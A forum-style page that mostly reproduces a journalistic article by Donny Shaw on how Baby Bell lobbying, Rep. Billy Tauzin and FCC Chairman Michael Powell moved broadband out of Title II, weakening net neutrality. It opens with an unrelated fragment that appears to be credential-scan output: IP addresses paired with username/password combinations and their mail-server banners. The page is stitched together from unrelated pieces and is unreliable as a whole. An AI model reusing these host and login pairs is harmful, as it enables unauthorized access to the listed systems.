-0200 75.76.126.57 training training|220 *************************************************************************************** 200.203.135.100 vnc vnc|220 smtp.princesadoscampos.com.br ESMTP Postfix 200.55.193.186 web web|220 serverweb Microsoft ESMTP MAIL Service, Version: 5.0.2195.7381 ready at Mon, 9 Feb 2015 17:37:51 -0400
  25. The chairman of the Federal Communications Commission announced recently he would seek to reclassify broadband Internet as a common carrier service so the government could enforce net neutrality rules, something that President Obama supports. Some telecom executives and Republicans in Congress are calling this an “extreme” and “backwards” proposal, and they’re investigating the President’s role in pushing for it. But we’ve only reached this pivotal moment in the net neutrality debate because of past efforts by corporate lobbyists and their political allies to weaken the government’s ability to protect the open Internet. Without the telecommunications industry’s massive power to design policies in its favor, the government would most likely already have the authority it needs to ensure net neutrality. In the early 2000s, back when Gmail was still for Garfield fans only, policymakers were facing important questions about the nature of broadband Internet and how it should be treated by regulators. The last major telecommunications bill was passed by Congress in 1996 and since then the technology had advanced rapidly, with two different services, cable Internet and digital subscriber line (DSL), becoming widely available. These services both operated on infrastructure that was originally built for other purposes (cable television and landline telephony, respectively), and since the 1996 bill didn’t address Internet service in a substantial way, regulators had simply applied the regulatory treatment traditionally associated with the infrastructures to the new Internet services being offered on them. That meant that cable Internet, carried over lines used to transmit television, was treated like an “information service,” while DSL, carried over copper telephone wires, was treated like a “telecommunications service.” The distinction is critical because under the 1996 law telecommunications services— things like wireline telephone service—are regulated more heavily under Title II of the law while information services—things like television channels and websites—are more lightly regulated under the Federal Communication Commission’s ancillary authority originating in Title I. Cable systems also face cable-specific rules from Title VI, which was added to communications law in 1984. Title II was designed by Congress in 1934 to prevent the companies that provide basic communications services from engaging in anticompetitive and discriminatory practices. It treats these services as “common carriers”—essentially private utilities that have to meet certain public benefit, openness, and non-discrimination requirements in exchange for owning and operating monopolies. At the time of its creation this applied primarily to telephone companies, but the requirements of the law are also well suited to preventing internet service providers from violating net neutrality principles. To consumers, cable and DSL ISPs were offering nearly identical services, but because of the outdated laws they were being treated very differently by regulators. In order to achieve regulatory parity, regulators had to decide if broadband service was more like a cable television channel or more like landline telephone service. In other words, they had to choose between regulating cable Internet up to Title II or deregulating DSL Internet service down to its general Title I authority. The Baby Bells In 2000 the DSL industry was dominated by the four remaining companies from the breakup of the old AT&T monopoly—Verizon, BellSouth, SBC Communications, and Qwest. These companies, commonly referred to as the “Baby Bells,” still operated regional monopolies and therefore were required under the 1996 bill to allow other carriers to access their networks. Because of this requirement, a new and growing industry of startup ISPs (competitive local exchange carriers, or CLECs) had begun leasing copper-line infrastructure from the Bells and offering competing broadband service to customers on their lines. Not surprisingly, as the Baby Bells rolled out their DSL service, they saw the cable industry’s more relaxed regulations and total lack of competition and wanted the same treatment from the government. They launched a massive lobbying effort to push the Clinton and Bush administrations, the Federal Communication Commission, and Congress to eliminate the network sharing requirement that had spawned the CLEC market and to deregulate DSL services more broadly. Between 1999 and 2002 the four companies spent a combined $95.6 million on lobbying the federal government, according to data from the Center for Responsive Politics, which would rank them above such trade group lobbying behemoths as the Chamber of Commerce and the American Medical Association in total lobbying expenditures for the years. The companies also spent millions to lobby the public directly through aggressive advertising and public relations campaigns. Their basic strategy was to push a bargain that if DSL was reclassified and they were allowed to operate regional monopolies without having to follow common carrier rules, they would voluntarily increase their investments in infrastructure and speed up the deployment of broadband in underserved areas. One of the Baby Bells’ closest allies in Congress at the time was Louisiana Democrat-turned-Republican Rep. Billy Tauzin, who in 2001 had become the Chairman of the Energy and Commerce Committee, which oversees telecommunications issues and the Federal Communications Commission. The four companies had given hundreds of thousands to Tauzin’s electoral campaigns over the years. In the 2000 election, Verizon was Tauzin’s largest single donor ($13,750) and SBC was his fourth largest ($10,000). In the 2002 election the Baby Bells gave more than $61,300 to Tauzin’s campaign committee and leadership PAC, making him the top congressional recipient of their political spending for that cycle. They also helped pay for a $400,000 Mardi Gras-themed fundraiser for Tauzin at the 2000 Republican National Convention. Tauzin’s son was employed at the time as a lobbyist for one of the Baby Bells, BellSouth, in Louisiana. (For more information on Tauzin’s deep relationship with the Bell companies, check out this article originally published at Interactive Weekly). In 2001 Tauzin teamed up with Democratic Rep. John Dingell, himself a top recipient of Baby Bell largesse, to sponsor legislation that would give the companies pretty much everything they had been lobbying for. Their bill, the “Internet Deployment and Broadband Freedom Act,” known more commonly as “Tauzin-Dingell,” would exempt Verizon and the Baby Bells from having to share their networks with competitive start-up carriers as required by the 1996 bill. The bill also proposed to add a new section to Title II of the Communications Act to broadly exempt broadband Internet, regardless of the carrier technology, from a wide swath of the regulatory powers held by the FCC and the states. “Neither the [Federal Communications] Commission, nor any State, shall have authority to regulate the rates, charges, terms, or conditions for, or entry into the provision of, any high speed data service, Internet backbone service, or Internet access service,” the bill text read in part. On February 27, 2002, Tauzin’s bill was brought to the floor of the House and passed by a vote of 273-157. Both Democrats and Republicans were divided on the bill, but it still won support from a majority of both parties. More than party affiliation, campaign contributions from Verizon and the Baby Bells were a better predictor of how members would vote, a fact that suggests the companies had a powerful influence over policymakers as they debated the future of broadband regulation. According to an analysis by the Center for Responsive Politics, the representatives who voted in favor of Tauzin-Dingell received, on average, 2.9 times more money from Verizon and the Baby Bells in the form of campaign contributions in the 2002 election than did the Representatives who voted against it. The cable industry was officially indifferent to Tauzin-Dingell, despite the fact that it benefited its chief competitor industry, because they recognized that it favored a “regulate down” approach and, if enacted, could put them in a better position for avoiding new regulations on their own services. “NCTA strongly believes that marketplace competition is the best way to foster the availability of broadband services to all Americans,” the National Cable & Telecommunications Association (NCTA) said in a statement. “Thus, we have not opposed the Tauzin-Dingell bill nor advocated that regulatory conditions be placed on broadband competitors." Tauzin’s friend Powell At the same time that the House was voting on the Tauzin-Dingell bill, the Federal Communications Commission was considering separately what they could do through rulemaking to achieve regulatory parity between cable and DSL. In 2000 the FCC launched a rulemaking proceeding to determine how to classify and regulate cable internet service. In 2002 they opened a similar proceeding for DSL that sought to “resolve outstanding issues regarding the classification of telephone-based broadband Internet access services and the regulatory implications of that classification.” Beginning in 2001, the Federal Communications Commission was chaired by Michael Powell, the son of Colin Powell and a former attorney for GTE Corp., the company that would form Verizon after merging with Bell Atlantic in 2000. Powell, in many ways, owes his position on the FCC to none other than Rep. Billy Tauzin. Back in 1997, Tauzin lobbied to get Powell appointed to the commission over incumbent Rachelle Chong, who was seeking a second term. Then, in 2001, Tauzin led the charge to get President Bush to elevate Powell to the chairmanship over Pat Wood III, who, until Tauzin got involved, was widely expected to take the position. As recounted by Village Voice reporter Brendan Koerner, Tauzin “engineered” Powell’s accession to the chairmanship as one of his first Bush-era acts. To recap: Powell, a former attorney for Verizon, was hand-picked to lead the FCC by the head of the congressional committee with oversight over the commission, Billy Tauzin, and immediately faced major decisions on the regulatory classification of the Internet, an issue that Tauzin had spent years working on and that directly impacted the bottom line of his biggest donors. Powell seems to have received the message that Billy Tauzin and the House of Representatives sent when they voted to gut Title II as it applies to the Internet. On Feb. 14, 2002, just two weeks after the House passed the Tauzin-Dingell bill, the Powell-led FCC took an unusual step that set in motion their approach to regulatory parity for cable and DSL. The Commission leapfrogged the typical public comment period and “notice of proposed rulemaking” and issued a declaratory ruling that cable Internet was properly classified as an information service, and thus not subject to common carrier rules, including line sharing requirements and nondiscrimination protections. One month later they released a rule proposal that tentatively concluded that DSL would also be reclassified as a Title I information service. The DSL reclassification was finalized in 2005. It’s unclear what kinds of discussions Billy Tauzin was having with Powell around the FCC’s decisions to classify broadband as a Title I information service, but watchdog groups were accusing him of “meddling” in related rulemaking proceedings at the agency around the same time. Later accounts of Tauzin’s involvement in health care legislation as a lobbyist for the pharmaceutical industry suggest that he can be aggressive at lobbying policymakers to bend his way. With the FCC’s rulings, broadband Internet service was officially differentiated from dial-up Internet service for regulatory purposes and reclassified to the same category of lightly regulated information services as things like websites or apps. The Powell-led FCC had finalized nearly all of the broadband deregulation that the Baby Bells had lobbied for and that Rep. Tauzin and Baby Bell-backed representatives had endorsed, but without having to go through Congress and change the law. These rulings led to the elimination of line-sharing requirements and decimated the CLEC industry that had been competing with the local monopolies for residential broadband customers. Years later Verizon and Comcast would use the rulings to kill the FCC’s attempts at enforcing net neutrality. In 2010, the DC Circuit Court of Appeals ruled in favor of Comcast in determining that the FCC did not have “reasonably ancillary” jurisdiction to use Title I of the Communication Act to stop Comcast from throttling peer-to-peer programs because they could not cite a statutorily mandated responsibility empowering them to do so. In 2014 the DC Circuit cited the Title I classification of ISPs in siding with Verizon and vacating the FCC’s second attempt at promulgating net neutrality rules. “Given that the Commission has chosen to classify broadband providers in a manner that exempts them from treatment as common carriers, the Communications Act expressly prohibits the Commission from nonetheless regulating them as such,” the court stated. Michael Powell left the FCC in 2005, but he is still one of the most powerful figures in determining Internet regulations and net neutrality rules. Powell is now the president and chief lobbyist of the NCTA, a cable industry trade group that has been the hands-down leader in the industry’s efforts to block net neutrality. Under Powell, the organization has increased its spending on lobbying year after year and it now spends more on lobbying than any other organization in the communications sector. With Powell at the helm working his connections in Congress and at the FCC, they seemed to be getting maximum bang for the buck because so-called revolving door connections make lobbying spending more effective—until current FCC Chairman and former NCTA chief Tom Wheeler announced that he would propose to reclassify broadband as Obama suggested. Although it looks like as though the FCC is about to reclassify broadband as Title II, many of the same factors that led to the deregulatory rulings of the early 2000s are still in play. Members of Congress, disproportionately those who are financially supported by large cable and telecom companies, are lobbying against Title II reclassification. The broadband industry is now more consolidated than ever and the industry’s promise of infrastructure investment in exchange for deregulation has not come to pass. The companies that provide Internet service to most Americans have not always been deregulated monopolies with the ability to create fast lanes and slow lanes on the Internet. They got there by using many of the tactics that have fueled the record levels of distrust in the U.S. government—bought politicians, corrupt legislation, and revolving-door power trading. While it’s not possible to examine the counterfactual history in which policymakers designed regulatory parity for the Internet with total independence, it should be acknowledged that the current net neutrality debate is based on past policy decisions, including the original removal of broadband from Title II, that were shaped by lobbying dollars and the raw monopoly power of America’s top telecommunications companies. Donny Shaw is a freelance journalist covering money in politics, tech, monopoly power and the legislative process. Source
×
×
  • Create New...